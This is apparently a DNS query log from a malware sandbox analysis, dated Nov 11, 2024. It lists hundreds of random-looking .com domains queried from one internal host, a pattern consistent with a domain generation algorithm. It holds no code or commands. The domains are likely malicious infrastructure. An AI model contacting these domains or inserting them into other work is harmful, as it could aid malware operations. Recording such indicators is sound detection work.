                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423865080 CET192.168.2.81.1.1.10x91b5Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.423907042 CET192.168.2.81.1.1.10xde01Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424074888 CET192.168.2.81.1.1.10x3cbaStandard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424099922 CET192.168.2.81.1.1.10x58f1Standard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424257040 CET192.168.2.81.1.1.10xd851Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424328089 CET192.168.2.81.1.1.10x59d1Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.424648046 CET192.168.2.81.1.1.10x1642Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.429811001 CET192.168.2.81.1.1.10x8dd0Standard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.429826975 CET192.168.2.81.1.1.10x7149Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430222988 CET192.168.2.81.1.1.10x8bd3Standard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430423975 CET192.168.2.81.1.1.10xa4e3Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430607080 CET192.168.2.81.1.1.10xa6e3Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.430707932 CET192.168.2.81.1.1.10x4e8aStandard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431159973 CET192.168.2.81.1.1.10xc8a1Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431250095 CET192.168.2.81.1.1.10xb0fcStandard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431359053 CET192.168.2.81.1.1.10xad8cStandard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431467056 CET192.168.2.81.1.1.10x2fbaStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431658983 CET192.168.2.81.1.1.10xafbeStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431806087 CET192.168.2.81.1.1.10xb2daStandard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.431977987 CET192.168.2.81.1.1.10xb227Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.432252884 CET192.168.2.81.1.1.10xd5a8Standard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.432468891 CET192.168.2.81.1.1.10xf0b8Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.435048103 CET192.168.2.81.1.1.10xd769Standard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.435621023 CET192.168.2.81.1.1.10x688Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.436270952 CET192.168.2.81.1.1.10x5ec3Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.437875032 CET192.168.2.81.1.1.10x94ffStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.449182987 CET192.168.2.81.1.1.10xd4ccStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.450778008 CET192.168.2.81.1.1.10xe36aStandard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.921614885 CET192.168.2.81.1.1.10x40a3Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.924787998 CET192.168.2.81.1.1.10x6a61Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.925008059 CET192.168.2.81.1.1.10x3b91Standard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.928534031 CET192.168.2.81.1.1.10xfd6aStandard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.933621883 CET192.168.2.81.1.1.10xb381Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.934026003 CET192.168.2.81.1.1.10xe516Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.941468954 CET192.168.2.81.1.1.10x26b6Standard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.945585012 CET192.168.2.81.1.1.10x89bdStandard query (0)qedysol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950191975 CET192.168.2.81.1.1.10x8ebdStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950417042 CET192.168.2.81.1.1.10x95ecStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.950788975 CET192.168.2.81.1.1.10xeb57Standard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:32.987977028 CET192.168.2.81.1.1.10x5284Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.000241041 CET192.168.2.81.1.1.10xcd66Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.003340960 CET192.168.2.81.1.1.10xe96aStandard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.006463051 CET192.168.2.81.1.1.10x1fe8Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.007777929 CET192.168.2.81.1.1.10xc494Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.009365082 CET192.168.2.81.1.1.10xb31cStandard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.023062944 CET192.168.2.81.1.1.10xb526Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.023260117 CET192.168.2.81.1.1.10x2461Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.024310112 CET192.168.2.81.1.1.10xb183Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.024528027 CET192.168.2.81.1.1.10x3246Standard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.031016111 CET192.168.2.81.1.1.10xc40eStandard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.031546116 CET192.168.2.81.1.1.10xa150Standard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.033189058 CET192.168.2.81.1.1.10x9a64Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.034262896 CET192.168.2.81.1.1.10x799eStandard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.035418034 CET192.168.2.81.1.1.10xdd2dStandard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.066570997 CET192.168.2.81.1.1.10x79f5Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.067236900 CET192.168.2.81.1.1.10x28cfStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.067658901 CET192.168.2.81.1.1.10x8131Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068106890 CET192.168.2.81.1.1.10xffedStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068377018 CET192.168.2.81.1.1.10xdd9aStandard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.068881035 CET192.168.2.81.1.1.10x24c2Standard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.073247910 CET192.168.2.81.1.1.10xe43cStandard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.079694986 CET192.168.2.81.1.1.10x5b86Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.079937935 CET192.168.2.81.1.1.10x453eStandard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081267118 CET192.168.2.81.1.1.10x7119Standard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081557989 CET192.168.2.81.1.1.10xdf55Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.081809998 CET192.168.2.81.1.1.10x86c2Standard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082056999 CET192.168.2.81.1.1.10x6a7dStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082391024 CET192.168.2.81.1.1.10x3b0fStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.082875013 CET192.168.2.81.1.1.10xf3c1Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083235025 CET192.168.2.81.1.1.10x4a08Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083498001 CET192.168.2.81.1.1.10x6cc8Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.083880901 CET192.168.2.81.1.1.10xca5dStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084041119 CET192.168.2.81.1.1.10x6c27Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084388018 CET192.168.2.81.1.1.10x16bfStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084439039 CET192.168.2.81.1.1.10x576fStandard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.084820032 CET192.168.2.81.1.1.10x2539Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.052700043 CET192.168.2.81.1.1.10xfb40Standard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.053261042 CET192.168.2.81.1.1.10x23ddStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.054250956 CET192.168.2.81.1.1.10x7e4Standard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.074174881 CET192.168.2.81.1.1.10xa3aeStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.074873924 CET192.168.2.81.1.1.10x2b81Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075162888 CET192.168.2.81.1.1.10x2d54Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075664997 CET192.168.2.81.1.1.10xb289Standard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.075885057 CET192.168.2.81.1.1.10xa451Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.076371908 CET192.168.2.81.1.1.10xc60cStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.076570988 CET192.168.2.81.1.1.10xaf4Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.078912973 CET192.168.2.81.1.1.10xfc28Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.080293894 CET192.168.2.81.1.1.10xea8aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.080456018 CET192.168.2.81.1.1.10x8711Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.104707956 CET192.168.2.81.1.1.10xb7b4Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.105015039 CET192.168.2.81.1.1.10x991cStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.105192900 CET192.168.2.81.1.1.10xf106Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.109411955 CET192.168.2.81.1.1.10x74b6Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.109787941 CET192.168.2.81.1.1.10x626aStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110029936 CET192.168.2.81.1.1.10xc934Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110029936 CET192.168.2.81.1.1.10x98a8Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110415936 CET192.168.2.81.1.1.10x88d8Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.110704899 CET192.168.2.81.1.1.10x6606Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.034157038 CET192.168.2.81.1.1.10xecb8Standard query (0)pujymip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.034915924 CET192.168.2.81.1.1.10xb73fStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.035305023 CET192.168.2.81.1.1.10xc136Standard query (0)qebylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.041966915 CET192.168.2.81.1.1.10x60f9Standard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.047557116 CET192.168.2.81.1.1.10xcbdcStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.048196077 CET192.168.2.81.1.1.10x1540Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.055584908 CET192.168.2.81.1.1.10xa45fStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.077934980 CET192.168.2.81.1.1.10x6f14Standard query (0)lykymox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.080615997 CET192.168.2.81.1.1.10x76dStandard query (0)ganyzub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.091747046 CET192.168.2.81.1.1.10xc0e9Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.096359968 CET192.168.2.81.1.1.10x5c62Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.110079050 CET192.168.2.81.1.1.10x3c18Standard query (0)lymylyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.118285894 CET192.168.2.81.1.1.10x3803Standard query (0)vopydek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.121654034 CET192.168.2.81.1.1.10xc024Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.122735023 CET192.168.2.81.1.1.10x6eaaStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.125637054 CET192.168.2.81.1.1.10xe58cStandard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.134126902 CET192.168.2.81.1.1.10xda05Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.139064074 CET192.168.2.81.1.1.10x4cefStandard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.139666080 CET192.168.2.81.1.1.10x907Standard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.140397072 CET192.168.2.81.1.1.10x27a3Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.144015074 CET192.168.2.81.1.1.10x7920Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.144876957 CET192.168.2.81.1.1.10x4491Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.163966894 CET192.168.2.81.1.1.10x6224Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.165869951 CET192.168.2.81.1.1.10x1cacStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.166635990 CET192.168.2.81.1.1.10x3e98Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.168634892 CET192.168.2.81.1.1.10xc388Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.170103073 CET192.168.2.81.1.1.10x3c33Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.171981096 CET192.168.2.81.1.1.10x81e6Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.179979086 CET192.168.2.81.1.1.10x497Standard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.180309057 CET192.168.2.81.1.1.10xba5dStandard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.180941105 CET192.168.2.81.1.1.10x78cfStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181104898 CET192.168.2.81.1.1.10x3da4Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181590080 CET192.168.2.81.1.1.10x8d63Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.181862116 CET192.168.2.81.1.1.10xa7f8Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182240009 CET192.168.2.81.1.1.10xa618Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182789087 CET192.168.2.81.1.1.10x5ef2Standard query (0)vowypit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.182967901 CET192.168.2.81.1.1.10x996fStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.187063932 CET192.168.2.81.1.1.10xb88bStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194196939 CET192.168.2.81.1.1.10xef15Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194384098 CET192.168.2.81.1.1.10x9cb1Standard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194643021 CET192.168.2.81.1.1.10x4af4Standard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196255922 CET192.168.2.81.1.1.10x29c1Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196443081 CET192.168.2.81.1.1.10x44cfStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196665049 CET192.168.2.81.1.1.10x1125Standard query (0)qebyrev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196824074 CET192.168.2.81.1.1.10x6c6aStandard query (0)pujygul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.197339058 CET192.168.2.81.1.1.10x3137Standard query (0)pufybyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.199991941 CET192.168.2.81.1.1.10x15d1Standard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200160027 CET192.168.2.81.1.1.10x3d3cStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200331926 CET192.168.2.81.1.1.10x772bStandard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200562000 CET192.168.2.81.1.1.10xd7e9Standard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200715065 CET192.168.2.81.1.1.10x9807Standard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200860023 CET192.168.2.81.1.1.10xbef0Standard query (0)puvylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201014042 CET192.168.2.81.1.1.10x520Standard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201174021 CET192.168.2.81.1.1.10x65e5Standard query (0)lykygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201335907 CET192.168.2.81.1.1.10xb571Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.216240883 CET192.168.2.81.1.1.10x94c4Standard query (0)gatycoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217331886 CET192.168.2.81.1.1.10x510bStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217518091 CET192.168.2.81.1.1.10xddceStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.234724045 CET192.168.2.81.1.1.10x4f42Standard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.790111065 CET192.168.2.81.1.1.10xb55bStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.791604996 CET192.168.2.81.1.1.10x353eStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.795953035 CET192.168.2.81.1.1.10xf59cStandard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.802401066 CET192.168.2.81.1.1.10x1a6fStandard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927174091 CET192.168.2.81.1.1.10x9297Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927357912 CET192.168.2.81.1.1.10x42c1Standard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927537918 CET192.168.2.81.1.1.10x664dStandard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927704096 CET192.168.2.81.1.1.10x8551Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.929182053 CET192.168.2.81.1.1.10x533eStandard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.352845907 CET192.168.2.81.1.1.10xe5c2Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438169956 CET192.168.2.81.1.1.10xd1fbStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438550949 CET192.168.2.81.1.1.10x38baStandard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.439269066 CET192.168.2.81.1.1.10x3237Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440757036 CET192.168.2.81.1.1.10x18efStandard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.440814018 CET192.168.2.81.1.1.10x9cecStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441157103 CET192.168.2.81.1.1.10xfbe9Standard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.441665888 CET192.168.2.81.1.1.10xafd5Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.442045927 CET192.168.2.81.1.1.10x4786Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.445207119 CET192.168.2.81.1.1.10x19dStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.446858883 CET192.168.2.81.1.1.10x138aStandard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.449376106 CET192.168.2.81.1.1.10x7e56Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.451149940 CET192.168.2.81.1.1.10xba1fStandard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.469146013 CET192.168.2.81.1.1.10x3237Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494211912 CET192.168.2.81.1.1.10xe0f1Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.494399071 CET192.168.2.81.1.1.10xfa97Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.495002031 CET192.168.2.81.1.1.10xf7fdStandard query (0)pupywog.comA (IP address)IN (0x0001)false
